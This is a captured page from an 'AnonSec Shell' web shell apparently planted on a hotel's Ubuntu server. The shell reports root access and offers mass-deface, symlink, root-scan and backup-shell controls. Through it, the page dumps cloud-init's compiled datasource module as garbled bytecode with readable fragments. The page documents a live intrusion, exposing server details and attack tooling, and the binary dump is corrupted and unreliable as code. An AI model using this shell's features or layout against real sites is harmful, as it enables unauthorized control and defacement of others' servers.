AnonSec Shell
Server IP : 209.38.156.173  /  Your IP : 216.73.216.122   [ Reverse IP ]
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.1.2-1ubuntu2.22
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/python3/dist-packages/cloudinit/sources/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /lib/python3/dist-packages/cloudinit/sources/__pycache__/__init__.cpython-310.pyc
o

x[h��@s�ddlZddlZddlZddlZddlZddlZddlZddlmZm	Z	ddl
mZmZm
Z
mZmZmZmZddlmZmZmZmZmZmZmZddlmZddlmZddlmZddlm Z dd	l!m"Z"m#Z#dd
l$m%Z%ddl&m'Z'ddl(m)Z)dd
l*m+Z+dZ,dZ-dZ.dZ/e,e-e.gZ0dZ1dZ2dZ3dZ4dZ5dZ6dZ7dZ8e�9e:�Z;ddd�fddd�fdd d�fd!�Z<e	Gd"d#�d#e��Z=Gd$d%�d%e�Z>Gd&d'�d'e?�Z@Gd(d)�d)e?�ZAGd*d+�d+e?�ZBdYd.d/�ZCe5fd0d1�ZDGd2d3�d3e�ZEGd4d5�d5e�ZFGd6d7�d7e�ZGGd8d�de)ejHd9�ZId:d;�ZJd<eeIeKffd=d>�ZLd?d@�ZM	AdZdBeKd<eNfdCdD�ZOdEdF�ZPd[dHdI�ZQGdJdK�dKeR�ZSdLdM�ZTdNeIdOeKd<eNfdPdQ�ZUdOeKd<eeIfdRdS�ZVd<eKfdTdU�ZWdVeKd<eKfdWdX�ZXdS)\�N)�Enum�unique)�Any�Dict�List�
NamedTuple�Optional�Tuple�Union)�
atomic_helper�dmi�importer�	lifecycle�net�performance�
type_utils)�	user_data)�util)�
write_json)�Distro)�
EventScope�	EventType)�launch_index)�Paths)�CloudInitPickleMixin)�events�disabled�localr�pass�
FILESYSTEM�NETWORK�
DataSourcez|EXPERIMENTAL: The structure and format of content scoped under the 'ds' key may change in subsequent releases of cloud-init.zredacted for non-root user�
cloud-name�_unset�unknownz	aws-chinacC�|dkS�N�aws���cr(r(�</usr/lib/python3/dist-packages/cloudinit/sources/__init__.py�<lambda>F�r,zaws-govcCr%r&r(r)r(r(r+r,Gr-zazure-chinacCr%)N�azurer(r)r(r(r+r,Hr-)zcn-zus-gov-�chinac@s2eZdZdZdZdZdZdZdZde	fdd	�Z
d
S)�NetworkConfigSourcezb
    Represents the canonical list of network config sources that cloud-init
    knows about.
    �cmdline�ds�
system_cfg�fallback�	initramfs�returncC�|jS�N��value��selfr(r(r+�__str__Y�zNetworkConfigSource.__str__N)�__name__�
__module__�__qualname__�__doc__�CMD_LINE�DS�
SYSTEM_CFG�FALLBACK�	INITRAMFS�strr=r(r(r(r+r0Lsr0c@s&eZdZdZdZdZdefdd�ZdS)�NicOrderzRepresents ways to sort NICs�mac�nic_namer6cCr7r8r9r;r(r(r+r=cr>zNicOrder.__str__N)r?r@rArB�MAC�NIC_NAMErHr=r(r(r(r+rI]s
rIc@�eZdZdZdS)�DatasourceUnpickleUserDataErrorzERaised when userdata is unable to be unpickled due to python upgradesN�r?r@rArBr(r(r(r+rOg�rOc@�eZdZdS)�DataSourceNotFoundExceptionN�r?r@rAr(r(r(r+rSk�rSc@rN)�InvalidMetaDataExceptionz8Raised when metadata is broken, unavailable or disabled.NrPr(r(r(r+rVorQrV�r(c
Cs�t�|�}g}g}|��D]V\}}|r|d|}n|}|��|vs(|��|vr-|�|�t|t�rD|�d�rD|�|�|�dd�||<t|t	�rct
|||�}	|�|	�d��|�|	�d��|	||<q
t
|�|d<t
|�|d<|S)z�Process all instance metadata cleaning it up for persisting as json.

    Strip ci-b64 prefix and catalog any 'base64_encoded_keys' as a list

    @return Dict copy of processed metadata.
    �/zci-b64:rW�base64_encoded_keys�sensitive_keys)�copy�deepcopy�items�lower�append�
isinstancerH�
startswith�replace�dict�process_instance_metadata�extend�pop�sorted)
�metadata�key_pathrZ�md_copyrY�	sens_keys�key�val�sub_key_path�
return_valr(r(r+rdss0



��rdcCs�|�dg�s|St�|�}|�d�D]+}|�d�}|}|D]}||vr4t||t�r4||dkr4||}q||vr=|||<q|S)z�Redact any sensitive keys from to provided metadata dictionary.

    Replace any keys values listed in 'sensitive_keys' with redact_value.
    rZrX���)�getr[r\�splitr`rc)rh�redact_valuerjri�
path_parts�obj�pathr(r(r+�redact_sensitive_keys�s"

���rwc@s.eZdZUeed<eed<eed<eed<dS)�	URLParams�max_wait_seconds�timeout_seconds�num_retries�sec_between_retriesN)r?r@rA�int�__annotations__r(r(r(r+rx�s

rxc@s"eZdZUeeed<eed<dS)�DataSourceHostname�hostname�
is_defaultN)r?r@rArrHr~�boolr(r(r(r+r�s
rc@s*eZdZUdZeed<eed<eed<dS)�HotplugRetrySettingsz
in seconds�force_retry�sleep_period�sleep_totalN)r?r@rArBr�r~r}r(r(r(r+r��s

r�c	@s�eZdZUeZdZdZdZee	e
d<dZdZdZ
eeee	fe
d<ejejejejfZeedfe
d<dZd	Zd
ZdZejejejej ej!hiZ"ejejhiZ#de$fd
e$fdifddddddf	Z%eee	e&fdfe
d<dZ'dZ(ee	dfe
d<dZ)e*ddd�Z+dZ,ee	e
d<dZ-d}de.de/fdd�Z0de1d dfd!d"�Z2d#d$�Z3d e4fd%d&�Z5d e4fd'd(�Z6d)d*�Z7d+d,�Z8d~d.d/�Z9e:j;d0d1d2�d e4fd3d4��Z<dd6d7�Z=d e4fd8d9�Z>d:d;�Z?d�d<d=�Z@d>d?�ZAd@dA�ZBeCdBdC��ZDeCdDdE��ZEdFdG�ZFeCdHdI��ZGdJdK�ZHeCdLdM��ZIdNdO�ZJdPdQ�ZKdRdS�ZLdTdU�ZMdVdW�ZNdXdY�ZOdZd[�ZPd\d]�ZQd^d_�ZRd`da�ZSeCdbdc��ZTeCddde��ZUdfdg�ZVd�dhdi�ZWdjdk�ZXdleYefdmdn�ZZdleYed e4fdodp�Z[dqdr�Z\dsdt�Z]e^d�dudv��Z_eCdwdx��Z`dydz�Zad{d|�ZbdS)�r!zen_US.UTF-8�_undefN�_cloud_name�_crawled_metadata.�network_config_sourcesrp�
���ec2_metadata�network_jsonrh)�userdataN)�userdata_rawN)�
vendordataN)�vendordata_rawN)�vendordata2N)�vendordata2_rawN�cached_attr_defaultsF)
�combined_cloud_config�
merged_cfg�merged_system_cfgzsecurity-credentialsr��	user-datarr��vendor-datazds/vendor_data�sensitive_metadata_keysr�extra_hotplug_udev_rules�distro�pathscCs�||_||_||_d|_i|_d|_d|_d|_d|_d|_	d|_
t|_t|_
t�|jd|jfi�|_|js9i|_|sDt�|j�|_dS||_dS)N�
datasource)�sys_cfgr�r�r�rhr�r�r�r�r��metadata_address�UNSETr�r�r�get_cfg_by_path�dsname�ds_cfg�ud�UserDataProcessor�ud_proc)r<r�r�r�r�r(r(r+�__init__Os*�
zDataSource.__init__�ci_pkl_versionr6cCs�dddtddtdddtddd�d�}|��D]\}}t||�s%t|||�qt|d�s3t|ddd��t|d�r\|jdur^zt|j�WdSty[}z
t�	d	|�t
�|�d}~wwdSdS)
z(Perform deserialization fixes for Paths.NFr)r��_platform_type�_subplatformr�r�r�r��skip_hotplug_detectr�r��hotplug_retry_settings�check_if_fallback_is_allowedcS�dS�NFr(r(r(r(r+r,}�z&DataSource._unpickle.<locals>.<lambda>r�z:Unable to unpickle datasource: %s. Ignoring current cache.)r�r�r]�hasattr�setattrr�rH�AttributeError�LOG�debugrO)r<r��expected_attrsrlr:�er(r(r+�	_unpickleis<
�
�
����zDataSource._unpicklecCs
t�|�Sr8�r�obj_namer;r(r(r+r=�s
zDataSource.__str__cCr�)z#Check if running on this datasourceTr(r;r(r(r+�	ds_detect��zDataSource.ds_detectcCsN|j��t���krt�d|�dS|j�dg�|jgkr%t�d|�dSdS)aJOverride if either:
        - only a single datasource defined (nothing to fall back to)
        - command line argument is used (ci.ds=OpenStack)

        Note: get_cmdline() is required for the general case - when ds-identify
        does not run, _something_ needs to detect the kernel command line
        definition.
        z6Kernel command line set to use a single datasource %s.T�datasource_listz2Datasource list set to use a single datasource %s.F)r�r^�
parse_cmdliner�r�r�rqr;r(r(r+�override_ds_detect�s	��zDataSource.override_ds_detectcCs<|��r|��S|��rt�d|�|��St�d|�dS)z&Overrides runtime datasource detectionzDetected %szDid not detect %sF)r��	_get_datar�r�r�r;r(r(r+�_check_and_get_data�s�zDataSource._check_and_get_datacCs�|��j}|��}|j}|d}diddg�d|�d|�dt|j|j|j��d|j�d	|j�d
|dd�d
|dd�d|dd�d|j�d|���d|d�d|�d|�d|dd�d|�d|�|dd|j|j	|d|dd��iS)z2Return a dictionary of standardized metadata keys.�sys_info�v1�
_beta_keys�subplatform�availability-zone�availability_zone�cloud_idr"�
cloud_namer��distr�distro_versionr��distro_release��platform�public_ssh_keys�python_version�python�instance-id�instance_id�kernel_release�uname�local-hostname�local_hostname��variant)�machine�regionr��system_platformr�)
�get_hostnamer��get_instance_idr��canonical_cloud_idr�r��
platform_type�get_public_ssh_keysr�)r<�
instance_datar�r�r��sysinfor(r(r+�_get_standardized_metadata�s`
�������	�
���
�������
��z%DataSource._get_standardized_metadatar(cCsP|jsdS|r
|}n|j}|D]\}}t||�rt|||�q|s&d|_dSdS)z�Reset any cached metadata attributes to datasource defaults.

        @param attr_defaults: Optional tuple of (attr, value) pairs to
           set instead of cached_attr_defaults.
        NF)�_dirty_cacher�r�r�)r<�
attr_defaults�attr_values�	attributer:r(r(r+�clear_cached_attrs�s
�
�zDataSource.clear_cached_attrszGetting metadata�always)�log_modecCs"d|_|��}|s|S|��|S)z�Datasources implement _get_data to setup metadata and userdata_raw.

        Minimally, the datasource should return a boolean True on success.
        T)r�r��persist_instance_data)r<�return_valuer(r(r+�get_data�szDataSource.get_dataTc

CsX|rtj�|jj�rt||j�d��|jdur/t�	|j�}|�
dd�|�
dd�d|i}ndd|jii}|jt
krB|j|dd<|jt
krN|j|dd<t|dd	<t�	|j�|d
<d|d
d	<t�	|d
�|d<d
|dd	<t��|d<|�|�|��zt�|�}tt�|�|jd�}Wn5ty�}zt�dt|��WYd}~dSd}~wty�}zt�dt|��WYd}~dSd}~ww|j� d�}|d�!dd�}tj�"|jj#d�}	t�$|	�d|��|�d��d}
|	�d|��}tj�%|	��rtj�&|	�}
tj'||	dd�|
�r|
|k�rt�(|
�t)||dd�|j� d�}t)|t*|��dS)aPProcess and write INSTANCE_JSON_FILE with all instance metadata.

        Replace any hyphens with underscores in key names for use in template
        processing.

        :param write_cache: boolean set True to persist obj.pkl when
            instance_link exists.

        @return True on successful write, False otherwise.
        �obj_pklNr�r�r2�	meta_datar�r��_docr�z<DEPRECATED: Use merged_system_cfg. Will be dropped from 24.1r�zUMerged cloud-init system config from /etc/cloud/cloud.cfg and /etc/cloud/cloud.cfg.d/r�)rZz'Error persisting instance-data.json: %sF�instance_data_sensitiver�r��nonezcloud-id�-�
T)�forcei�)�moder�)+�osrv�lexistsr��
instance_link�	pkl_store�
get_ipath_curr�r[r\rfrhr�r�r��EXPERIMENTAL_TEXTr�r�system_info�updater�r�
json_dumpsrd�json�loadsr��	TypeErrorr��warningrH�UnicodeDecodeError�get_runpathrq�join�run_dir�
write_file�exists�realpath�sym_link�del_filerrw)
r<�write_cache�crawled_metadatar��content�processed_datar��json_sensitive_filer��
cloud_id_file�prev_cloud_id_file�new_cloud_id_file�	json_filer(r(r+r�sn



���
�

����
z DataSource.persist_instance_datacCstd��)z@Walk metadata sources, process crawled data and save attributes.zlSubclasses of DataSource must implement _get_data which sets self.metadata, vendordata_raw and userdata_raw.)�NotImplementedErrorr;r(r(r+r�Qs�zDataSource._get_datac
CsB|j}zt|j�d|j��}Wnty$t�td|j�d�|�Ynw|j}zt	dt|j�d|j���}WntyO|j}t�td|j�d�|�Ynw|j
}zt|j�d|j
��}Wntytt�td|j�d�|�Ynw|j}zt|j�d|j��}Wnty�t�td	|j�d�|�Ynwt
||||�S)
z�Return the Datasource's preferred url_read parameters.

        Subclasses may override url_max_wait, url_timeout, url_retries.

        @return: A URLParams object with max_wait_seconds, timeout_seconds,
            num_retries.
        �max_waitz6Config max_wait '%s' is not an int, using default '%s'r�timeoutz5Config timeout '%s' is not an int, using default '%s'�retriesz5Config retries '%s' is not an int, using default '%s'r|zAConfig sec_between_retries '%s' is not an int, using default '%s')�url_max_waitr}r�rq�
ValueErrorr�logexcr��url_timeout�max�url_retries�	Exception�url_sec_between_retriesrx)r<rrrr|r(r(r+�get_url_paramsXsd
��
��	
����
��	zDataSource.get_url_paramscCs2|jdur|j�|���|_|r|�|j�S|jSr8)r�r��process�get_userdata_raw�
_filter_xdata)r<�apply_filterr(r(r+�get_userdata�s

zDataSource.get_userdatacC�"|jdur|j�|���|_|jSr8)r�r�r'�get_vendordata_rawr;r(r(r+�get_vendordata��
zDataSource.get_vendordatacCr,r8)r�r�r'�get_vendordata2_rawr;r(r(r+�get_vendordata2�r/zDataSource.get_vendordata2cCs|js	|j��|_|jSr8)r�r�r^r;r(r(r+r��szDataSource.platform_typecCs|js|��|_|jS)a�Return a string representing subplatform details for the datasource.

        This should be guidance for where the metadata is sourced.
        Examples of this on different clouds:
            ec2:       metadata (http://169.254.169.254)
            openstack: configdrive (/dev/path)
            openstack: metadata (http://169.254.169.254)
            nocloud:   seed-dir (/seed/dir/path)
            lxd:   nocloud (/seed/dir/path)
        )r��_get_subplatformr;r(r(r+r��s
zDataSource.subplatformcCs|jr
d|j�d�StS)z?Subclasses should implement to return a "slug (detail)" string.z
metadata (�))r��METADATA_UNKNOWNr;r(r(r+r2�szDataSource._get_subplatformcCs~|jr|jS|jr5|j�t�r5|j�t�}t|t�r"|��|_|jS|����|_t�	dtt
|��|jS|����|_|jS)z�Return lowercase cloud name as determined by the datasource.

        Datasource can determine or define its own cloud product name in
        metadata.
        z5Ignoring metadata provided key %s: non-string type %s)r�rhrq�METADATA_CLOUD_NAME_KEYr`rHr^�_get_cloud_namer�r��type)r<r�r(r(r+r��s 


���zDataSource.cloud_namecCr7)z�Return the datasource name as it frequently matches cloud name.

        Should be overridden in subclasses which can run on multiple
        cloud names, such as DatasourceEc2.
        )r�r;r(r(r+r6�szDataSource._get_cloud_namecCs"|jsdSd|jvr|jdSdS)Nzlaunch-index)rhr;r(r(r+r�s


zDataSource.launch_indexcCs0t�t�|j��g}|}|D]}|�|�}q|Sr8)r�Filterr�safe_int�apply)r<�processed_ud�filters�new_ud�fr(r(r+r)�s�zDataSource._filter_xdatacCr7r8)r�r;r(r(r+r(�r>zDataSource.get_userdata_rawcCr7r8)r�r;r(r(r+r-�r>zDataSource.get_vendordata_rawcCr7r8)r�r;r(r(r+r0�r>zDataSource.get_vendordata2_rawcCsiSr8r(r;r(r(r+�get_config_obj�szDataSource.get_config_objcCst|j�d��S)Nzpublic-keys)�normalize_pubkey_datarhrqr;r(r(r+r�szDataSource.get_public_ssh_keyscCr�)a5Publish the public SSH host keys (found in /etc/ssh/*.pub).

        @param hostkeys: List of host key tuples (key_type, key_value),
            where key_type is the first field in the public key file
            (e.g. 'ssh-rsa') and key_value is the key itself
            (e.g. 'AAAAB3NzaC1y...').
        Nr()r<�hostkeysr(r(r+�publish_host_keysr�zDataSource.publish_host_keyscCsdddi}|��D]'\}}|�|�sq|D]}d||t|�d�f}tj�|�r.|SqqdS)N�sd)�vd�xvd�vtbz	/dev/%s%s)r]ra�lenr�rvr
)r<�
short_name�mappings�nfrom�tlist�nto�candr(r(r+�
_remap_device
s
��zDataSource._remap_devicecC�dSr8r()r<�_namer(r(r+�device_name_to_devicesz DataSource.device_name_to_devicecCs,|j}z|j��}W|StyY|Sw)z<Default locale is en_US.UTF-8, but allow distros to override)�default_localer��
get_localer)r<�localer(r(r+rS%s��zDataSource.get_localecCs2|j�d|j�d��}|r|S|j�di��d�S)Nr�r��	placement�rhrq)r<�top_level_azr(r(r+r�.s�zDataSource.availability_zonecCs|j�d�S)Nr�rVr;r(r(r+r�7szDataSource.regioncCs"|jrd|jvr
dSt|jd�S)Nr�ziid-datasource)rhrHr;r(r(r+r�;szDataSource.get_instance_idcCsXd}d}|}d}|jr|j�d�sW|rtd|�Sg}t��}	|	dkr$d}t�|	�}
|
r:|
�d�dkr:t|
��d�}nI|	rK|	�d�dkrKt|	��d�}n8|	rR|	|g}n1||g}n,|jd}t	�
|�r~g}|rjt�|�}|rtt|��d�}nd	|�dd
�g}n|�d�}t
|�dkr�|d}	d�|dd��}n|d}	|r�||kr�d|	|f}	t|	|�S)
a�Get hostname or fqdn from the datasource. Look it up if desired.

        @param fqdn: Boolean, set True to return hostname with domain.
        @param resolve_ip: Boolean, set True to attempt to resolve an ipv4
            address provided in local-hostname meta-data.
        @param metadata_only: Boolean, set True to avoid looking up hostname
            if meta-data doesn't have local-hostname present.

        @return: a DataSourceHostname NamedTuple
            <hostname or qualified hostname>, <is_default> (str, bool).
            is_default is a bool and
            it's true only if hostname is localhost and was
            returned by util.get_hostname() as a default.
            This is used to differentiate with a user-defined
            localhost hostname.
            Optionally return (None, False) when
            metadata_only is True and local-hostname data is not available.
        �localdomain�	localhostFr�NT�.rzip-%sr�r�z%s.%s)rhrqrrr��get_fqdn_from_hosts�findrHrrr�is_ipv4_address�
gethostbyaddrrbrGr
)r<�fqdn�
resolve_ip�
metadata_only�	defdomain�defhost�domainr��toksr��
hosts_fqdn�lhostr(r(r+r�AsF








zDataSource.get_hostnamecCs|jj|d�S)N)�data_source)r��get_package_mirror_infor;r(r(r+ri�sz"DataSource.get_package_mirror_info�source_event_typescCsPi}|D]!}|j��D]\}}||vr$|�|�st�||<||�|�qq|Sr8)�supported_update_eventsr]rq�set�add)r<rj�supported_events�event�update_scope�
update_eventsr(r(r+�get_supported_events�s�

��zDataSource.get_supported_eventsc	Cs�|�|�}|��D]\}}t�d|jd�dd�|D���|�d|tff�q	|r6|��|��}|r6dSt�d|d�dd�|D���d	S)
a�Refresh cached metadata if the datasource supports this event.

        The datasource has a list of supported_update_events which
        trigger refreshing all cached metadata as well as refreshing the
        network configuration.

        @param source_event_types: List of EventTypes which may trigger a
            metadata update.

        @return True if the datasource did successfully update cached metadata
            due to source_event_type.
        z:Update datasource metadata and %s config due to events: %s�, cS�g|]}|j�qSr(r9��.0ror(r(r+�
<listcomp>��z;DataSource.update_metadata_if_supported.<locals>.<listcomp>z
_%s_configTz(Datasource %s not updated for events: %scSrtr(r9rur(r(r+rw�rxF)	rrr]r�r�r:r
r�r�r�)r<rjrn�scope�matched_events�resultr(r(r+�update_metadata_if_supported�s&
��z'DataSource.update_metadata_if_supportedcCr�r�r()r<r�r(r(r+�check_instance_id�r�zDataSource.check_instance_idcCr�)acheck_if_fallback_is_allowed()
        Checks if a cached ds is allowed to be restored when no valid ds is
        found in local mode by checking instance-id and searching valid data
        through ds list.

        @return True if a ds allows fallback, False otherwise.
        Fr(r;r(r(r+r��sz'DataSource.check_if_fallback_is_allowedcCsT|durt}|durt}|D]}|durq||vr|St�d||�|S|S)Nz%invalid dsmode '%s', using default=%s)�DSMODE_NETWORK�
VALID_DSMODESr�r)�
candidates�default�valid�	candidater(r(r+�_determine_dsmode�s�zDataSource._determine_dsmodecCrOr8r(r;r(r(r+�network_config�r�zDataSource.network_configcCr�)a(setup(is_new_instance)

        This is called before user-data and vendor-data have been processed.

        Unless the datasource has set mode to 'local', then networking
        per 'fallback' or per 'network_config' will have been written and
        brought up the OS at this point.
        Nr()r<�is_new_instancer(r(r+�setup�s	zDataSource.setupcCr�)a�activate(cfg, is_new_instance)

        This is called before the init_modules will be called but after
        the user-data and vendor-data have been fully processed.

        The cfg is fully up to date config, it contains a merged view of
           system config, datasource config, user config, vendor config.
        It should be used rather than the sys_cfg passed to __init__.

        is_new_instance is a boolean indicating if this is a new instance.
        Nr()r<�cfgr�r(r(r+�activate�szDataSource.activater8)r(�T)F)FFF)NN)cr?r@rAr~�dsmoderRr�r�rrHr~r�r�r�r
rr0rCrGrErDr�r	rr!r#r%rr r�BOOT_NEW_INSTANCE�BOOT�BOOT_LEGACY�HOTPLUGrk�default_update_eventsr�r�rr�r�r�r�r�r��_ci_pkl_versionrrr�r}r�r=r�r�r�r�r�r�r�timedr�r�r�r&r+r.r1�propertyr�r�r2r�r6rr)r(r-r0r?r�rBrNrQrSr�r�r�r�rirrrr|r}r��staticmethodr�r�r�r�r(r(r(r+r!�s�
� ����
�%
&
L
<



			


H
�
�&

)�	metaclasscCs�g}|s|St|t�r|��St|ttf�rt|�St|t�rC|��D]\}}t|t�r/|g}t|ttf�rB|D]	}|rA|�|�q8q#|Sr8)r`rH�
splitlines�listrlrcr]r_)�pubkey_data�keys�_keyname�klist�pkeyr(r(r+r@s"



�r@r6c	Cs.t|||�}dd�|D�}t|vrdnd}	t�d|	|�t||�D]j\}
}tjd|
�dd�d	|	|
fd
|	|
f|d�}z?|�3t�d|�||||�}
|
�t	j
g�rkd
|	|
f|_|
t�
|�fWd�WSWd�n1suwYWq!ty�t�td|�Yq!wdd�|�}t|��)NcSsg|]}t�|��qSr(r�)rvr>r(r(r+rw"szfind_source.<locals>.<listcomp>�networkrz#Searching for %s data source in: %sz	search-%sr!rWzsearching for %s data from %szno %s data found from %s)�name�description�message�parentz%Seeing if we can get any data from %szfound %s data from %szGetting data from %s failedz4Did not find any data source, searched classes: (%s)rs)�list_sources�DEP_NETWORKr�r��zipr�ReportEventStackrbr|rr�r�rr�r$rr r
rS)r�r�r��ds_deps�cfg_list�pkg_list�reporter�ds_list�ds_namesr�r��cls�myrep�s�msgr(r(r+�find_sources>

�������r�cCs�g}t�d|||�|D]5}t�|�}t�||dg�\}}|s%t�d|�|D]}t�|�}	t|	d�}
|
|�}|r@|�|�nq'q|S)z�Return a list of classes that have the same depends as 'depends'
    iterate through cfg_list, loading "DataSource*" modules
    and calling their "get_datasource_list".
    Return an ordered list of classes that match (if any)
    zLLooking for data source in: %s, via packages %s that matches dependencies %s�get_datasource_listzDCould not import %s. Does the DataSource exist and is it importable?)	r�r�r
�"match_case_insensitive_module_name�find_module�error�
import_module�getattrre)r��dependsr��src_listr2�ds_name�m_locs�_looked_locs�m_loc�mod�lister�matchesr(r(r+r�?s6�
��


��r��system-uuid�fieldcCs*|sdSt�|�}|s
dS|��|��kSr�)r�
read_dmi_datar^)r�r��	dmi_valuer(r(r+�instance_id_matches_system_uuidcs
r�cCsl|st}|st}|tkr|tkr|S|St��D]\}}|\}}|�|�r-||�r-|Sq|tkr4|S|S)z@Lookup the canonical cloud-id for a given cloud_name and region.)r4�CLOUD_ID_REGION_PREFIX_MAPr]ra)r�r�r��prefix�
cloud_id_testr��valid_cloudr(r(r+r�qs �r�TcCsf|sdSt|t�r|St|t�rt�|�St|t�r+|dur't|�d�dd�Std��tdt	|���)aLdata: a loaded object (strings, arrays, dicts).
    return something suitable for cloudinit vendordata_raw.

    if data is:
       None: return None
       string: return string
       list: return data
             the list is then processed in UserDataProcessor
       dict: return convert_vendordata(data.get('cloud-init'))
    NTz
cloud-initF)�recursez'vendordata['cloud-init'] cannot be dictz$Unknown data type for vendordata: %s)
r`rHr�r[r\rc�convert_vendordatarqrr7)�datar�r(r(r+r��s



r�c@rR)�BrokenMetadataNrTr(r(r(r+r��rUr�cCs4g}t|�}|D]\}}|t|�kr|�|�q|Sr8)rlr_)r�r��ret_list�depsetr��depsr(r(r+�list_from_depends�s
�r�ru�fnamecCsnzt�|�}Wntyt�td|�YdSwztj||ddd�WdSty6t�td|�YdSw)z[Use pickle to serialize Datasource to a file as a cache.

    :return: True on success
    zFailed pickling datasource %sF�wb�)�omoder�z Failed pickling datasource to %sT)�pickle�dumpsr$rr r�r)rur��pk_contentsr(r(r+r��s���r�c
Cs�d}zt�|�}Wnty(}ztj�|�rt�d||�WYd}~nd}~ww|s-dSzt�	|�WSt
y=YdStyMt�td|�YdSw)zBUse pickle to deserialize a instance Datasource from a cache file.Nzfailed loading pickle in %s: %sz#Failed loading pickled blob from %s)r�load_binary_filer$r�rv�isfiler�rr�rrOr )r��pickle_contentsr�r(r(r+�pkl_load�s$���r�cCstt���S)z�Check if command line argument for this datasource was passed
    Passing by command line overrides runtime datasource detection
    )�parse_cmdline_or_dmir�get_cmdliner(r(r(r+r��sr��inputcCs�t�d|�}t�d|�}t�d|�}|p|p|}|p|}|r7|�d���}tjd|�d|��dd|�d	�d
�|rC|�d�rC|�d�SdS)Nz(?:^|\s)ds=([^\s;]+)z(?:^|\s)ci\.ds=([^\s;]+)z (?:^|\s)ci\.datasource=([^\s;]+)r�z8Defining the datasource on the command line using ci.ds=z or ci.datasource=z23.2zUse ds=z instead)�
deprecated�deprecated_version�
extra_messagerW)�re�search�group�stripr�	deprecate)r��
ds_parse_0�
ds_parse_1�
ds_parse_2r2r�r�r(r(r+r��s&��
�	
r�)rWr()r�r�)Y�abcr[r�loggingr�r�r��enumrr�typingrrrrrr	r
�	cloudinitrrr
rrrrrr�r�cloudinit.atomic_helperr�cloudinit.distrosr�cloudinit.eventrr�cloudinit.filtersr�cloudinit.helpersr�cloudinit.persistencer�cloudinit.reportingr�DSMODE_DISABLED�DSMODE_LOCALr~�DSMODE_PASSr�DEP_FILESYSTEMr��	DS_PREFIXr�REDACT_SENSITIVE_VALUEr5r�r4�	getLoggerr?r�r�r0rIr$rOrSrVrdrwrxrr��ABCMetar!r@rHr�r�r�r�r�r��IOErrorr�r�r�r�r�r�r(r(r(r+�<module>s�
$$	
�



�

#@

�!%��
�
	

Anon7 - 2022
AnonSec Team